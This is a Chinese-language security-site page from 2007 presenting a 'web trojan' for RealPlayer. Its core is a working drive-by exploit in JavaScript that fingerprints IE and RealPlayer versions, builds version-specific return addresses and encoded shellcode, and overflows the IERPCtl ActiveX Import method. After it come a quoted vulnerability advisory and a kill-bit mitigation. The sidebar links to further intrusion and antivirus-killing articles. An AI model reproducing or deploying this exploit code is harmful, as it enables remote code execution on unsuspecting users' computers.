精典的ASP 传奇的J2EE 新生的NET FTP服务器服务器安全 WINDOWS B/S 模式 WEB安全 WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建 Alexa专题 DHTML 项目管理 WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual Basic Visual C/C++ Mssql MySql oracle Sybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术 WAP入门

您的位置： >> 相关知识 >> 病毒木马 >> 病毒知识 >>

RealPlayer 最新网马

合金网络科技

添加日期:2007-11-27 点击次数:45次

<script language='javascript'>
eval('function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf('msie 6')==-1&&user.indexOf('msie 7')==-1)
  return;
if(user.indexOf('nt 5.')==-1)
  return;
VulObject = 'IER' + 'PCtl.I' + 'ERP' + 'Ctl.1';
try
{
  Real = new ActiveXObject(VulObject);
}catch(error)
{
  return;
}
RealVersion = Real.PlayerProperty('PRODUCTVERSION');
Padding = '';
JmpOver = unescape('%75%06%74%04');
for(i=0;i<32*148;i++)
  Padding += 'S';

if(RealVersion.indexOf('6.0.14.') == -1)
{
  if(navigator.userLanguage.toLowerCase() == 'zh-cn')
   ret = unescape('%7f%a5%60');
  else if(navigator.userLanguage.toLowerCase() == 'en-us')
   ret = unescape('%4f%71%a4%60');
  else
   return;
}
else if(RealVersion == '6.0.14.544')
  ret = unescape('%63%11%08%60');
else if(RealVersion == '6.0.14.550')
  ret = unescape('%63%11%04%60');
else if(RealVersion == '6.0.14.552')
  ret = unescape('%79%31%01%60');
else if(RealVersion == '6.0.14.543')
  ret = unescape('%79%31%09%60');
else if(RealVersion == '6.0.14.536')
  ret = unescape('%51%11%70%63');
else
  return;

if(RealVersion.indexOf('6.0.10.') != -1)
{
  for(i=0;i<4;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf('6.0.11.') != -1)
{
  for(i=0;i<6;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf('6.0.12.') != -1)
{
  for(i=0;i<9;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf('6.0.14.') != -1)
{
  for(i=0;i<10;i++)
   Padding = Padding + JmpOver;
   Padding = Padding + ret;
}

AdjESP = 'LLLL\\XXXXXLD';
Shell = 'TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp';
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
  PayLoad += 'YuanGe'; // 汗~袁哥~-.=!
Real.Import('c:\\Program Files\\NetMeeting\\TestSnd.wav', PayLoad,'', 0, 0);
}
RealExploit();')
</script>

关于该漏洞的说明(来自绿盟):

Quotation

RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞
RealPlayer是一款流行的媒体播放器，支持多种媒体格式。

RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表，因此如果用户受骗访问了恶意网页并通过IERPCtl ActiveX控件的Import()方式导入了恶意文件的话，就可以触发这个溢出，导致拒绝服务或执行任意指令。

<*来源：Will Dormann

  链接：http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.h
        http://www.kb.cert.org/vuls/id/871673
        http://service.real.com/realplayer/security/191007_player/en/
        http://secunia.com/advisories/27248/
        http://www.us-cert.gov/cas/techalerts/TA07-297A.html
*>

建议：
--------------------------------------------------------------------------------
临时解决方法：

在IE中禁用IERPCtl ActiveX控件，为以下CLSID设置kill bit：

{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

或将以下文本保存为.REG文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}]
'Compatibility Flags'=dword:00000400

◆精典的ASP精选TOP

· 利用ADODB.Stream 防盗链

· Adodb.Stream说明手册

· 采集需要登录

· ASP 判断远程图片是否存在

· 在ServerXMLHTTP组件中使用代理服务器

· 用XMLHTTP通过代理服务器从服务提取数据的一些问题

· objXML.readystate的值

· 互联网HTTP连接等出错代码大全

· 利用XMLHTTP实现的二级连动Select

· 利用 xmlhttp 分块上传文件

◆服务器安全点击TOP

· 新云最新漏洞总结篇

· 各类网站的默认数据库和密码

· Windows Server2003 防木马权限设置IIS服务器安全配置整理

· 针对ASP网站的Win 2003硬盘安全设置

· IIS 6 的PHP 最佳配置方法

· 利用SA.exe 将Iusr_victim克隆为Administrator

· Cmd模式下的入侵技术大全

· 破解网页代码加密

· SERV-U 6.4提权方法,通杀SERV-U版本

· 新云网站管理系统文件注入漏洞

◆硬设与组建点击TOP

· 从头到尾教你组建小型局域网20

· 从头到尾教你组建小型局域网19

· 从头到尾教你组建小型局域网18

· 从头到尾教你组建小型局域网17

· 从头到尾教你组建小型局域网16

· 从头到尾教你组建小型局域网15

· 从头到尾教你组建小型局域网14

· 从头到尾教你组建小型局域网13

· 从头到尾教你组建小型局域网12

· 从头到尾教你组建小型局域网11

◆病毒知识点击TOP

· 不再重装手动清除顽固病毒AutoRUN

· 木马静态变动态 DLL木马程序大揭秘

· 详解一个很牛X的网马

· 一个网马

· Trojan-Downloader.Win32.Delf.bab

· 抓了一个AJAX的网马

· 迅雷5 最新0day利用程序

· 自动关掉270种杀毒软件

· RealPlayer 最新网马

· 五个反弹型后门的源代码

◆WINDOWS点击TOP

· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· Capture an HTML document as an image

· 如何给eWebEditor编辑器加上运行代码框功能

· 给CuteEditor5增加了高亮代码显示功能

· CuteEditor6.0使用配置心得体会

· 关于IE插件的CLSID问题

· 对开发的程序（制作CAB）进行签名，并允许网站中使用

"凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."